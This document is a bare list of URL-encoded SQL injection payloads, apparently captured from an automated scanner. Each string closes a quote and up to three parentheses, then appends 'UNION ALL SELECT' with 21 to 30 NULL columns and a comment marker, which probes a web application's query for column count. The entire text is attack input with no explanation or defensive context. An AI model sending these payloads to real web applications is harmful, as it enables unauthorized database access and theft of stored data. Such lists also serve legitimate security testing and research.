foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 